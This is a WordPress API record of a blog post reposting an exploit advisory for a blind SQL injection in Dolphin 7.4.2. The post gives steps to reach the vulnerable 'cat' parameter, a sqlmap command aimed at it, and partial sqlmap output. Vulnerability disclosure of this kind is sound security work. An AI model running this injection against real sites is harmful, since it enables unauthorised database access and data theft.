{"id":58640,"date":"2024-08-05T20:39:47","date_gmt":"2024-08-05T17:39:47","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179907\/dolphin742-sql.txt"},"modified":"2024-08-05T20:39:47","modified_gmt":"2024-08-05T17:39:47","slug":"dolphin-7-4-2-blind-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/dolphin-7-4-2-blind-sql-injection\/","title":{"rendered":"Dolphin 7.4.2 Blind SQL Injection"},"content":{"rendered":"<pre readability=\"7.5\"><code readability=\"9\"># Exploit Title: Blind SQL Injection - dolphinv7.4.2.<br># Date: 8\/2024<br># Exploit Author: Andrey Stoykov<br># Version: 7.4.2<br># Tested on: Ubuntu 22.04<br># Blog:<br>https:\/\/msecureltd.blogspot.com\/2024\/07\/friday-fun-pentest-series-8-dolphinv742.html<p>SQL Injection:<\/p><p>Steps to Reproduce:<\/p><p>1. Navigate to \"Builders\" menu<br>2. The HTTP GET parameter of \"?cat=builders\" is displayed in the URL bar<br>3. That is the injection point<\/p><p>sqlmap -r request.txt --dbms=mysql -p cat<\/p>[...][INFO] the back-end DBMS is MySQL<br>web application technology: PHP 5.4.45, Apache<br>back-end DBMS: MySQL &gt;= 5.0.12<br>[...]<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Blind SQL Injection &#8211; dolphinv7.4.2.# Date: 8\/2024# Exploit Author: Andrey Stoykov# Version: 7.4.2# Tested on: Ubuntu 22.04# Blog:https:\/\/msecureltd.blogspot.com\/2024\/07\/friday-fun-pentest-series-8-dolphinv742.htmlSQL Injection:Steps to Reproduce:1. Navigate to &#8220;Builders&#8221; menu2. The HTTP GET parameter of &#8220;?cat=builders&#8221; is displayed in the URL bar3. That is the injection pointsqlmap -r request.txt &#8211;dbms=mysql -p cat[&#8230;][INFO] the back-end DBMS is MySQLweb &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58640","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58640","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58640"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58640\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58640"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}